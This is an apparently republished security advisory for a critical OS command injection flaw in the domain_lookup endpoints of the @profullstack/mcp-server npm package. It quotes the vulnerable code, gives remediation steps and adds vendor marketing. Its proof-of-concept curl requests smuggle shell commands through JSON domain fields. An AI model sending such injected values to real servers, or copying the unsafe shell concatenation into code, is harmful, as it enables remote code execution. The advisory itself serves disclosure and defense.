GHSA-V6WJ-C83F-V46X

GHSA-V6WJ-C83F-V46X is a critical-severity OS command injection vulnerability in @profullstack/mcp-server (npm), affecting versions <= 1.4.12. No fixed version is listed yet.

Summary

Security Advisory: OS Command Injection in profullstack/mcp-server domain_lookup Module
Field Value
Project profullstack/mcp-server
Repository https://github.com/profullstack/mcp-server
Affected Commit 2e8ea913573610667ad54e31dba2e8198ebf7cf9
Affected Module mcp_modules/domain_lookup
Affected Endpoints POST /domain-lookup/check, POST /domain-lookup/bulk
Vulnerability Type CWE-78: OS Command Injection
CVSS 3.1 Score 9.8 (Critical), AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Authentication Required None
Default Network Exposure Bind address 0.0.0.0, no global authentication middleware
Validated 2026-04-21 (initial), 2026-04-28 (re-confirmed)

Summary

The domain_lookup module assembles a shell command string by concatenating user-controlled input (domains / keywords) and passes it to execAsync(). Both HTTP endpoints reach the same sink. Because there is no argument quoting, escaping, or allowlist, and no authentication on the server, an unauthenticated remote attacker can execute arbitrary OS commands as the server process.

Affected Code

  • index.js:27, server binds to 0.0.0.0, no global auth middleware.
  • mcp_modules/domain_lookup/index.js:52, registers POST /domain-lookup/check.
  • mcp_modules/domain_lookup/index.js:55, registers POST /domain-lookup/bulk.
  • mcp_modules/domain_lookup/src/service.js:19, :20, buildTldxCommand() concatenates user input into the shell string.
  • mcp_modules/domain_lookup/src/service.js:114, :115, :142, execAsync(command) sink reached from both routes.

Vulnerable Code

File: mcp_modules/domain_lookup/src/service.js

Step 1, User input concatenated directly into a shell string:

buildTldxCommand(keywords, options = {}) {
  let command = `tldx ${keywords.join(' ')}`;

if (options.prefixes?.length) {
command += --prefixes ${options.prefixes.join(',')};
}
}

Step 2, That shell string is executed as-is:

async checkDomainAvailability(domains, options = {}) {
  try {
    const command = this.buildTldxCommand(domains, options);
    const { stdout, stderr } = await execAsync(command);

There is no sanitization between Step 1 and Step 2. Shell metacharacters (;, |, $(), etc.) in user input are interpreted by /bin/sh at execution time.

Proof of Concept

Tested against a local Docker build of the affected commit (0.0.0.0:13000->3000/tcp).

PoC A, POST /domain-lookup/check

Request:

curl -X POST http://localhost:13000/domain-lookup/check \
  -H 'Content-Type: application/json' \
  -d '{"domains":["example.com; echo final_check_poc > /tmp/verify-exports/final_check.txt; #"]}'

Response:

HTTP/1.1 500 Internal Server Error
access-control-allow-origin: *
content-type: application/json
Date: Tue, 21 Apr 2026 04:32:39 GMT

{"error":"tldx command failed: tldx command failed: /bin/sh: tldx: not found\n"}

Side effect confirmed inside container:

$ cat /tmp/verify-exports/final_check.txt
final_check_poc

PoC B, POST /domain-lookup/bulk

Request:

curl -X POST http://localhost:13000/domain-lookup/bulk \
  -H 'Content-Type: application/json' \
  -d '{"keywords":["safe","x; echo final_bulk_poc > /tmp/verify-exports/final_bulk.txt; #"]}'

Response:

HTTP/1.1 500 Internal Server Error
access-control-allow-origin: *
content-type: application/json
Date: Tue, 21 Apr 2026 04:32:40 GMT

{"error":"Bulk domain check failed: Bulk domain check failed: /bin/sh: tldx: not found\n"}

Side effect confirmed inside container:

$ cat /tmp/verify-exports/final_bulk.txt
final_bulk_poc

Note on HTTP 500

Both requests return HTTP 500 because tldx is not installed in the test container. The injected commands are interpreted by the shell before tldx is invoked. The marker files confirm that attacker-controlled commands executed successfully despite the 500 response. In a production environment where tldx is installed, both the intended function and the injected commands execute.

Impact

  • Unauthenticated remote code execution as the server process UID.
  • Full read/write access to any file the server process can access.
  • Potential for outbound connections, credential theft, persistence, and lateral movement.
  • Reproducible with a single unauthenticated HTTP POST to either of two documented endpoints.

Suggested Remediation

  1. Replace execAsync(command) with child_process.execFile or spawn('tldx', [keyword1, keyword2, ...]), pass arguments as an array, never as a concatenated shell string.
  2. Validate all domain/keyword input against a strict allowlist (RFC 1035 hostname syntax) before invoking the external binary; reject any input containing shell metacharacters.
  3. Add a global authentication middleware so all HTTP-exposed modules are not callable anonymously.
  4. Default the server bind address to 127.0.0.1 and require explicit opt-in for non-loopback bindings.

Verification Environment

  • Local Docker container only; no third-party deployment was tested.
  • The container does not include the tldx binary; this is intentional for safe local PoC and does not affect exploitability.

Impact

Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.

GHSA-V6WJ-C83F-V46X has a CVSS score of 9.8 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

@profullstack/mcp-server (<= 1.4.12)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

No fixed version is listed for GHSA-V6WJ-C83F-V46X yet.

In the interim: Avoid passing untrusted input to shell commands. Use parameterized APIs or libraries that do not invoke a shell.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is GHSA-V6WJ-C83F-V46X? GHSA-V6WJ-C83F-V46X is a critical-severity OS command injection vulnerability in @profullstack/mcp-server (npm), affecting versions <= 1.4.12. No fixed version is listed yet. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
  2. How severe is GHSA-V6WJ-C83F-V46X? GHSA-V6WJ-C83F-V46X has a CVSS score of 9.8 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of @profullstack/mcp-server are affected by GHSA-V6WJ-C83F-V46X? @profullstack/mcp-server (npm) versions <= 1.4.12 is affected.
  4. Is there a fix for GHSA-V6WJ-C83F-V46X? No fixed version is listed for GHSA-V6WJ-C83F-V46X yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is GHSA-V6WJ-C83F-V46X exploitable, and should I be worried? Whether GHSA-V6WJ-C83F-V46X is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-V6WJ-C83F-V46X is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-V6WJ-C83F-V46X? No fixed version is listed yet. In the interim: Avoid passing untrusted input to shell commands. Use parameterized APIs or libraries that do not invoke a shell.

Other vulnerabilities in @profullstack/mcp-server

Stop the waste.
Protect your environment with Kodem.